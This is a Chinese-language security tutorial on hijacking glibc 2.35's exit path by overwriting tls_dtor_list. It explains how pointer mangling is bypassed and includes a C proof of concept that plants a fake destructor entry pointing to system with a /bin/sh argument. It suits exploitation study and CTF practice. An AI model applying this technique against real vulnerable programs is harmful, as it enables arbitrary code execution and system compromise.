glibc2.35-通过tls\_dtor\_list劫持exit执行流程

2023-09-06 16:57:25

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

前言
==

glibc2.35删除了malloc\_hook、free\_hook以及realloc\_hook，通过劫持这三个hook函数执行system已经不可行了。

传统堆漏洞利用是利用任意地址写改上上述几个hook从而执行system，在移除之后则需要找到同样只需要修改某个地址值并且能够造成程序流劫持的效果。

\_\_call\_tls\_dtors
====================

在程序返回时会通过exit函数，exit函数会经历以下调用过程

exit  
\->  
\_\_run\_exit\_handlers  
\->  
\_\_call\_tls\_dtors

而`__call_tls_dtors`函数中则存在着可以进行劫持的地址，`__call_tls_dtors`函数的执行如下：

*   判断`tls_dtor_list`为空
    
*   不为空则将`tls_dtor_list`赋值给`cur`
    
*   取出函数指针`cur->func`
    
*   通过`PTR_DEMANGLE`宏解密指针值
    
*   执行函数指针
    

void  
\_\_call\_tls\_dtors (void)  
{  
while (tls\_dtor\_list)  
{  
struct dtor\_list \*cur = tls\_dtor\_list;  
dtor\_func func = cur->func;  
#ifdef PTR\_DEMANGLE  
PTR\_DEMANGLE (func);  
#endif  
​  
tls\_dtor\_list = tls\_dtor\_list->next;  
func (cur->obj);  
atomic\_fetch\_add\_release (&cur->map->l\_tls\_dtor\_count, -1);  
free (cur);  
}  
}

通过上述流程可知，若能够劫持`tls_dtor_list`，则可以将`cur->func`指向的位置修改为`system`函数。具体取出`tls_dtor_list`的汇编语言如下

![image-20230825223658781](https://image.3001.net/images/20230906/1693990646_64f83ef64feb668058091.png)

*   首先取出`tls_dtor_list`的下标值，即`rbx`寄存器的值为`0xffffffffffffffa8`，转换为十进制为`-88`
    
*   而该下标是用`fs`进行寻址的，然后取出`tls_dtor_list`的值判断是否为空
    

![image-20230825224106945](https://image.3001.net/images/20230906/1693990647_64f83ef7f40652e98624d.png)

那么假设已经存在任意地址写的漏洞，并且将`tls_dtor_list`修改为不是空值，看看后续会进入哪些校验流程。

![image-20230825224554854](https://image.3001.net/images/20230906/1693990649_64f83ef986ff0c0c019dd.png)

首先遇到第一个问题，在后续的流程中需要将`tls_dtor_list`的内容作为指针值进行索引，因此我们不能够直接将`system`函数的地址写入`tls_dtor_list`，而是需要将指向`system`函数的指针写入。即在堆题中，我们新创建一个堆，并在堆内容写入`system`函数的地址，然后将堆地址填充到`tls_dtor_list`中

![image-20230825224743540](https://image.3001.net/images/20230906/1693990650_64f83efa72650ce364c00.png)

根据上述的方法，我们成功进入后续的流程

![image-20230825225326920](https://image.3001.net/images/20230906/1693990652_64f83efca14fbb8750e5a.png)

但是在执行函数执行时，会遇到另一个问题，最后的指针值被修改为乱七八糟的值了。

![image-20230825225409551](https://image.3001.net/images/20230906/1693990654_64f83efe59bd36593c831.png)

这是因为上述的宏定义`PTR_DEMANGLE`，需要将函数指针进入一个解密的流程，因此在传递指针值时，需要先传递一个加密后的指针值。解密的流程如下，

先将指针循环右移`0x11`，然后与`fs:[0x30]`进行异或。循环右移比较好解决，先将指针循环左移即可。但是这个异或值则需要获得`fs:[0x30]`的值。

0x7ffff7c45d88 <\_\_call\_tls\_dtors+40>    ror    rax, 0x11  
0x7ffff7c45d8c <\_\_call\_tls\_dtors+44>    xor    rax, qword ptr fs:\[0x30\]

也可以看到这个值是一个八字节的随机值，因此通过爆破获得的可能性不大。

![image-20230825225742846](https://image.3001.net/images/20230906/1693990655_64f83effe89beb5f05bb8.png)

那么该攻击方法需要的一个要求就是能够获得该随机值或者能够篡改该值。需要注意点是指针值是先循环右移在异或，因此在加密指针时需要先异或在循环左移。那么解决上述问题之后就能够正确调用地址了，此时就应该考虑该函数指针需要如何传参。可以看到下图，`rdi`寄存器是通过我们传入的指针值作为基地址进行寻址的，只需要在偏移加8的位置填充`/bin/sh`的地址值即可。

![image-20230825230839748](https://image.3001.net/images/20230906/1693990657_64f83f01107da34ec5286.png)

POC
===

#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
​  
unsigned long long rotate\_left(unsigned long long value, int left)  
{  
return (value << left) | (value >> (sizeof(unsigned long long) \* 8 - left));  
}  
​  
​  
int main() {  
unsigned long long fs\_base;  
unsigned long long index = 0xffffffffffffffa8;  
unsigned long long tls\_dtor\_list\_addr;  
unsigned long long random\_number;  
void \*system\_ptr = (void \*)&system;  
printf("system:%p\\n",system\_ptr);  
// 使用汇编嵌入获取FS寄存器的值  
asm("mov %%fs:0, %0" : "=r" (fs\_base));  
printf("Value in FS register: 0x%llx\\n", fs\_base);  
tls\_dtor\_list\_addr = fs\_base - 88;  
random\_number = \*(unsigned long long \*)(fs\_base + 0x30);  
char \*str\_bin\_sh = malloc(0x20);  
strcpy(str\_bin\_sh,"/bin/sh");  
void \*ptr = malloc(0x20);  
\*(unsigned long long \*)ptr = rotate\_left((unsigned long long)system\_ptr ^ random\_number,0x11);  
\*(unsigned long long \*)(ptr + 8)  = str\_bin\_sh;  
\*(unsigned long long \*)tls\_dtor\_list\_addr = ptr;  
return 0;  
}

总结
==

简单总结一下通过`tls_dtor_list`劫持`exit`执行流程的条件

*   存在任意地址写的漏洞利用
    
*   能够篡改或泄露`fs_base + 0x30`的值
    
*   程序会通过`exit`函数结束程序，若是通过`_exit`则不行
    

\# 漏洞利用 \# glibc \# 堆